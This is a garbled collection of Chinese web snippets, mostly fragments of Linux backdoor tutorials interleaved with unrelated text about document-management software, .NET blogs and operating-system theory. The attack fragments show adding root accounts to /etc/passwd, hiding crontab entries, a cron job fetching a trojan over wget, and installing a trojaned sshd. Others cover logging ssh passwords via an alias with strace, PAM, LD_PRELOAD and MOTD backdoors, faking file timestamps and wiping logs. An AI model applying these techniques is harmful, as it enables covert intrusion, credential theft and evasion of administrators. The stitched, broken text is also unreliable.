可以监视系统负载、进程状态、CPU和内存占用。有一个更易用的变种htop。 ps:显示系统所有运行中进程的一个快照。...输出可以定制成显示PID、PPID、用户、负载、内存、积累的用户/系统时间、启动时间、以及更多。有一个变种pstree可以用树结构显示进程。...vmstat:一个简单的命令行工具,可以显示多个实时系统特征,例如进程数、剩余内存、分页状态、CPU占用、块设备I/O活动、中断/上下文切换统计、等等。
系统账户后门是一种最为简单有效的权限维持方式。攻击者在获取目标系统权限的前提下,通过创建一个系统账户作为持久化的据点,这样可以随时通过工具连接到目标系统,达到对目标主机进行长久控制的目的。...,攻击者和目标系统可以进行数据交互,就可以根据系统反馈的提示信息创建系统账户和设置登录口令。...系统账户的口令。...`openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 查询当前Linux...系统隐藏的系统账户后门,可以通过查询/etc/passwd文件中的新增的潜藏用户,也可以通过awk指令查询uid=0和uid>=500的用户名,如图3-1-2 awk指令查询用户名。
, Centos 以及 Rocky Linux 等没有这个文件,甚至系统级配置文件位置都不同 根据 /etc/vim/vimrc 中注释描述,将所有系统侧配置文件都放置在 /usr/share/vim/...flag 变量这个操作是成功了的,相信看到这里,部分小伙伴已经对后门有想法了,但请不要着急,这部分主要是探索 vim 配置详细加载情况 2....删除掉刚刚配置 $VIMRUNTIME 的内容,采用 Linux 环境变量的方式进行配置 果然,$VIMRUNTIME 是从 Linux 操作系统的环境变量来的 因此永久修改 VIMRUNTIME...不一定会修改 runtimepath ,只有通过Linux 操作系统环境变量来永久修改 VIMRUNTIME 时才会修改 runtimepath 的值,通过vim系统配置文件的方式永久修改 3) runtimepath...制作后门文件 1) 下载源代码 在相同版本的 Linux 主机 B 上下载相同版本 vim 源代码 在主机B上编辑更新源,取消 deb-src 的注释 在主机 B 上下载 vim 源代码(可以指定版本
Linux操作系统后门 alias alias 命令可以设置别名 执行 ll 相当于执行 ls -l alias ll=ls -l ssh 后门设计 在管理员使用 ssh 时生效,后门将输入的 ssh...-i;\rno crontab for `whoami`%100c\n")|crontab - TCP_Wrappers TCP_Wrappers 是一个工作在应用层的安全工具 以 ssh 为例,每当有...tar -xzvf Linux-PAM-1.1.8.tar.gz 修改源码,添加后门代码 vim ....替换原有 PAM 模块,添加后门 cd Linux-PAM-1.1.8 编译 PAM 源码 ....名为 sshd,位于 /usr/sbin/sshd,将系统原来的 sshd 移到 /usr/bin 下 创建后门 cd /usr/sbin/ mv sshd ..
$(nohup vim -E -c "py3file demo.py"> /dev/null 2>&1 &) && sleep 2 && rm -f demo....
sudo 经常被用来将普通用户权限提升至 root 权限,代替 root 执行部分程序来管理 Linux 系统,这样避免 root 密码被泄漏 这篇文章介绍了三种利用其留后门的方法,其中也涉及一个sudo...有趣的特性,在极端条件下可能是系统的薄弱点;同时涉及一个没什么人关注的小知识点 sudo 配置后门 sudoedit 文件所有者后门 sudo plugin 后门 这篇文章以 Ubuntu Server...,该需求相应的配置文件为 /etc/sudoers 以及 /etc/sudoers.d/ 目录下的文件 随着操作系统版本迭代,很多应用程序都将配置文件分为两部分,主配置文件以及主配置文件加载的配置文件...echo '123456' | sudo -S cat /etc/passwd 可以考虑搞新建 空白文件名 文件 + alias 劫持的方法来隐藏新建文件 有时候也没必要新建用户,可以尝试开启那些系统用户试试...,或许有惊喜也说不定,但是这种操作一定要提前试一试 0x02 sudoedit 文件所有者后门 这个后门更偏向于一个概念性的后门,以趣味性为主吧 前段时间复现 CVE-2023-22809 的时候关注到
此时我产生了一个疑问,系统默认的这些个别名是在哪里设置的呢?alias 是不是有一个统一的配置文件呢? 抱着这样的疑问,我想看一看alias 相关的文件夹以及文件 which alias ?.../etc/profile 【系统级】Linux是一个多用户操作系统。...%h%m%s'`.log -e read,write,connect -s2048 ssh' 上面是我搜索了10多篇文章,发现的同一条后门命令,既然有前辈写了,咱们就分析分析 上面后门中,其实 alias...调试性能问题,查看系统调用的频率,找出耗时的程序段 查看程序读取的是哪些文件从而定位比如配置文件加载错误问题 查看某个php脚本长时间运行“假死”情况 当程序出现“Out of memory”时被系统发出的...把strace的输出单独写到指定的文件 /tmp/sshpwd-xxx.log ,这个没啥好说的 -e read,write,connect Linux内核目前有300多个系统调用,详细的列表可以通过
Linux因其强大的功能和灵活性,在多个领域和场景中得到了广泛的应用。以下是Linux的主要用途及其适用场景:1. 服务器领域Linux在服务器操作系统市场中占据主导地位,因为它稳定、高效且安全。...Facebook等大型网站使用Linux支撑高并发访问。2. 桌面用途Linux也可以作为个人或办公电脑的操作系统,适合程序员、设计师、学生等不同人群。...示例:Android手机系统基于Linux内核。路由器和网络设备通常运行定制版Linux。5. 超级计算机Linux是超级计算机领域的绝对主导者。...教育和科研Linux在大学和研究机构中普遍用于教学和研究。开源的特点使其适合学习计算机体系结构和操作系统原理。示例:学生学习操作系统课程时常用Linux实验。8....机器人和人工智能用于机器人操作系统(ROS)。支持深度学习框架(如TensorFlow、PyTorch)。示例:自动驾驶汽车中嵌入了基于Linux的控制系统。
3.echo "++">>/.rhosts 如果这个系统开了512,513的port呵呵,就可以 把一个名为hack加到.rhosts文件中,rlogin登陆,无要密码!...-Linux 后门 echo "love::0:0::/:/bin/bash" >> /etc/passwd echo "love::::::::" >> /etc/shadow 有时间的话,就多留几个后门...留了后门就要擦你的PP了,不是吧,这也忘了! Unix系统日志文件通常是存放在 "/var/log and /var/adm" 目录下的。...通常我们可以查看syslog.conf来看看日志配置的情况.如:cat /etc/syslog.conf 一般我们要清除的日志有 lastlog utmp wtmp messages syslog...如果你有像wipe.c 那样的清日志的程序,就可以让它来做,不然的话就要手动了!
Ubuntu server 16.04 默认 /etc/ssh/ssh_config
Linux 计划任务是一项服务,由 cron 工具来完成,主要目的就是在无需人工干预的情况下运行作业 PS: 功能较为简单的at命令在Ubuntu 16.04中已经不自带了 0x01 cron服务简介...看起来像是一个文件,因为有注释有空格,那么究竟是不是一个文件呢?一会儿再说吧(Linux上万物皆文件,肯定是文件啦!)...3 * * * rm -r /home/xxxx/test/* 每隔10分钟下载一下我们的木马 */10 * * * * wget http://www.test.com/muma.exe 0x05 后门利用...0x06 巧用计划任务留后门 (crontab -l;printf "*/1 * * * * /home/helper/1.sh;\rno crontab for `whoami`%100c\n")|crontab...可以看到,果然是有差异的,使用 crontab -e 来进行查看一下 ?
.NET 和 C# 开源博客系统概览 .NET 是一个跨平台且开源的软件开发框架,C# 作为其战略下的编程语言,为开发者提供了构建各种应用的强大工具。...对于博客系统的开发,.NET 和 C# 支撑了多个著名的开源项目,这些项目不仅为个人和企业提供了解决方案,同时也促进了社区的发展和技术的进步。 1....Orchard Core 描述: 高度模块化的开源内容管理系统(CMS),适用于构建博客和网站。 特点: 灵活的主题和插件系统,易于定制和扩展。...N2 CMS 描述: 功能全面的 CMS 系统,提供可视化编辑界面和模板系统。 特点: 适合用于开发定制化的博客平台,具有丰富的功能集。...选择合适的博客系统取决于您的具体需求、技术栈以及您希望实现的功能。在选择时,请考虑每个系统的社区支持、文档完善度以及是否持续更新维护等因素。
文档管理系统,简称DMS,是一种专门设计用于帮助组织有效管理其文档和文件的软件工具。它可以将文件整理、存储、索引,以便轻松查找和共享。下面来看看有哪些好用的文档管理系统吧: 1....TeamDoc文档管理系统: TeamDoc电子文档管理系统提供了一系列关键功能,以确保文档的安全性和高效管理。...此外,系统还支持在线协同编辑,帮助团队成员更好地协作。海量文档可以快速准确定位和查询,而清晰的群组/部门划分有助于更有序的管理。...OpenText Documentum的一些作用有:企业内容管理、文档管理、工作流程管理、记录管理等,以帮助大型企业管理业务内容为主。 4. eFileCabinet: 用于中小型企业的文档管理软件。...如果您的企业还未采用文档管理系统,现在正是时候!不要为了整理混乱的文件浪费您的时间。文档管理系统为企业带来了诸多优势,包括提高生产力、减少错误、确保合规性和简化工作流程。
0x00 前情提要 在 alias 后门 | Linux 后门系列一文中,我们为了让后门完美一些,修改了后门文件的 atime、mtime,但是 ctime 一直没有办法修改,今天我们来把这一块补齐,...让后门更加完美 atime -> access time, 访问时间 mtime -> modify time,修改时间 ctime -> change time, 状态变化时间 最新版 Linux 中多了一个属性...详细知识可以查看鸟哥的网站 http://cn.linux.vbird.org/linux_server/0440ntp.php 查看系统时钟 date 查看硬件时钟 sudo hwclock --show...,但应该不会差很多 从硬件时间恢复操作系统时间 sudo hwclock --hctosys 这个命令的含义是使用硬件时间的值作为系统时间 为了防止原来的系统时间和硬件时间有较大差异,在修改系统时间之前可以先看一下系统时间和硬件时间是否有较大差距...0x09 信息征集 Centos 8 官方已于21年底停止了支持,请问大家公司将 Centos 换成哪些系统了呢?
操作系统的基本服务有: 操作系统有一组服务用于提供用户功能: 用户界面:几乎所有的操作系统都有用户界面,这种界面可有多种形式,一种是命令行界面,另一种是批处理界面。...系统程序:用于管理、维护操作系统,为用户使用操作系统服务。 操作系统结构 现代操作系统庞大而复杂,常用方法是将这种系统分成子系统或模块。...微内核的例子有:CMU的Mach(第一个微内核系统)、Tru64 Unix、Windows NT,2000以及后续版本。...模块结构:大部分现代操作系统采用模块结构,采用可加载的内核模块是目前操作系统设计的最佳方法。内核有一组核心组件,无论在启动还是运行时,内核都可通过模块链入额外服务。...例子有:现代UNIX和Windows。 混合系统:许多现代操作系统不是采用单一结构,通过采用多种结构获取性能、安全和使用等方面需求。
需要的知识点更高一些 动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令 这次我们劫持 whoami 命令 ,查看一下 whoami 命令都调用了哪些库函数...可以看到这里有一个 whoami ,我们就劫持它,思路如下: 覆盖这个函数,并且在内部重写 先把原函数指针赋值给一个变量 执行我们的代码 执行原函数 正常返回值 preload.c #include...查看原命令设置后门后显示什么样 alias 劫持一下显示,让设置后的显示与设置前一致 千万记得先去看一下是否系统默认或者管理员设置过这个命令的别名,参照之前的 ls 劫持 alias ,让 alias...设置的别名不显示 劫持 unalias ,让系统管理员无法直接用 unalias 命令来取消 alias 等别名 先来 echo 没有设置后门时是这样的 ?...成功劫持 export 没有设置后门时候是这样的 ? 设置后门后是这样的 ?
最近看了苑房弘老师的打靶课程,发现了 MOTD 这个东西,于是研究了一下,发现很适合做后门,早在08年以前就有恶意软件使用了这种方式,今天系统地研究一下 motd,全称Message Of The Day...,是Linux中发送问候消息的功能,一般在我们登录服务器后显示 每次任意用户登录时都会触发motd服务的功能,这个功能的脚本几乎都是使用root 权限来启动的,所以很适合用来做后门 实用部分 随着关注我们的朋友越来越多...root权限 留后门 这个目录下的所有文件在任意用户登录后都会执行一遍,所以我们可以选择新建一个脚本或者修改其中的脚本来完成留后门的目的 以 00-header 文件为例 #!...答案是并不会,此时我怀疑是不是对目录权限有要求,所以我复制了 /etc/update-motd.d 这个目录的权限,之后创建了新的脚本 结果还是不会执行 source 和 ....来加载配置文件呀,这完全可以作为一个单独的后门方式去讲,但这里已经讲了就不单独开章节了 我们在 Ubuntu 18.04 中简单搜索一下 粗略的计算有 196 个 这就是说这些文件中我们都可以塞进去一些恶意程序
这篇文章主要讲解了“Linux远程连接的方法有哪些”,文中的讲解内容简单、清晰、详细,对大家学习或是工作可能会有一定的帮助,希望大家阅读完这篇文章能有所收获。...不过在说怎样连接之前还是要先明确一个概念,为什么我标题没有用linux中的远程桌面连接呢,这是因为Linux下面的桌面,也就是我们所说的X Window ,只是linux下的一个应用程序而已, 所以linux...先说说通过SSH(Secure Shell)连接到linux下的shell,如果的操作平台是windows下,你可以下载SSH客户端工具连接到linux,比如最常用的PuTTY,你可以去这里下载: http...提起VNC大家肯定不要陌生,它是一个踌平台的远程控制软件, 有linux上装好它的服务器端,我们就可以通过客户端来进行连接了。...现在大家对于Linux远程连接的方法有哪些的内容应该都有一定的认识了吧,希望这篇能对大家有所帮助。
ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门...: 将sshdb.tgz后门程序放置到你自己的服务器的某目录下,并且改成为test.tgz,这里为www.test.com的根目录下 # wget http://www.test.com/test.tgz...# tar zxvf test.tgz # cd openssh 4、设置ssh后门的登录密码: vi includes.h define _SECRET_PASSWD "test1234" ->...#test1234位后门连接密码 5、编译安装: # ....ssh_config touch -r /etc/ssh/sshd_config.old /etc/ssh/sshd_config 重启服务 # /etc/init.d/sshd restart 6、登入后门
d在我们攻防当中,常常会碰到linux机器,拿到之后为了避免发现 低权限升高权限 创建一个c文件 #include int main() { setuid(0);
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
